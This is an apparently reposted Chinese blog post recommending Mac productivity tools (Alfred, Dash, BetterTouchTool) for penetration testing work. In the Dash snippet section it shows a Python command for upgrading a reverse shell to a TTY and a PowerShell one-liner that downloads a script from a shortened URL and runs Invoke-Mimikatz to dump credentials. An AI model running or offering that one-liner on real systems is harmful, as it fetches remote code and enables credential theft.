Mac 上极大提高入侵渗透效率的几个 “非安全” 工具

admin 2017年8月20日10:30:00评论86 views字数 1270阅读4分14秒阅读模式

Mac 上极大提高入侵渗透效率的几个 “非安全” 工具

Tools on Mac that vastly boost your efficiency in Hacking!


向大家介绍几个我一直以来强烈给周边朋友推荐的 Mac 上的软件,它们能够极大地提高工作效率。


Alfred - https://www.alfredapp.com/

Alfred 有很多极为方便的功能,我已经彻底无法离开他。这里我只演示 Alfred 提供的非常强大的工作流功能。身边有一些朋友一直只是将 Alfred 做为一个快速的应用启动器来用,却不知道工作流的功能是多么强大。





Dash - https://kapeli.com/dash

“Dash is an API Documentation Browser and Code Snippet Manager”

Dash 是一个 API 文档浏览器与代码片段管理器。它将几乎所有流行语言的 API 文档(其实远不止 API)做了整理,使得你可以直接在 Dash 里面(或者通过 Alfred 的工作流)以极快地速度对这些 API 文档进行查阅。对于经常需要查询各类语言 API 的朋友,绝对不能错过。


一想到以前要查个 API 的时候要先打开 Google 输入 API 名,然后等待搜索结果出来再找到对应的网页,再等待页面打开就感觉实在太麻烦了!


放一张图片与一个小视频大家感受一下:

Mac 上极大提高入侵渗透效率的几个 “非安全” 工具



Dash 还有一个很好用的 Snippet 功能(Alfred 中也有,不过有一些小小的区别),用于收藏代码片段,可以将你渗透中常用的大段命令记在里面,然后很方便的在需要的时候输出,省去了每次都要打开笔记本 Command+C 后 Command+V 的麻烦。


比如通过 Python 将一个反弹回来的 Shell 提升为 ttyshell 的代码:

python -c 'import pty; pty.spawn("/bin/sh")'

你能想像我只按了 tty` 这四个键就输出了上面这段代码吗?


再比如利用 Powershell 导出凭据的命令:

powershell "IEX (New-Object

Net.WebClient).DownloadString('http://is.gd/oeoFuI'); InvokeMimikatz

-DumpCreds"

我只按了 psdump` 这 7 个键就输出了这段命令,再也不用每次手动写或者翻笔记本手动复制了。


BetterTouchTool - https://www.boastr.net/

这是一个用于增强键盘与触摸板功能的应用,可以用于改键,添加各类组合快捷键以及触摸板手势来触发某些功能。我个人目前最常用到的是:

  1.  Chrome 中,Command + 双指下划 = 查看网页源代码

  2.  全局下, Command + 四指轻拍 = 截图

  3.  全局下,五批轻拍 = Command + ` ,切换同一应用的不同窗口

  4.  全局下,四指轻拍 = Command + Tab ,切换应用

  5.  不少软件的切换标签页的快捷键都不太一样,比如 Chrome 是 Option + Command + 箭头,而 iTerm 中 Shift + Command + 箭头。我利用 BTT 的快捷键映射功能将它们全改成同一套快捷键,方便记忆。



有兴趣的可以自己体验一下,这几个工具远比我这里介绍的要强大。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年8月20日10:30:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Mac 上极大提高入侵渗透效率的几个 “非安全” 工具https://cn-sec.com/archives/277191.html

发表评论

匿名网友 填写信息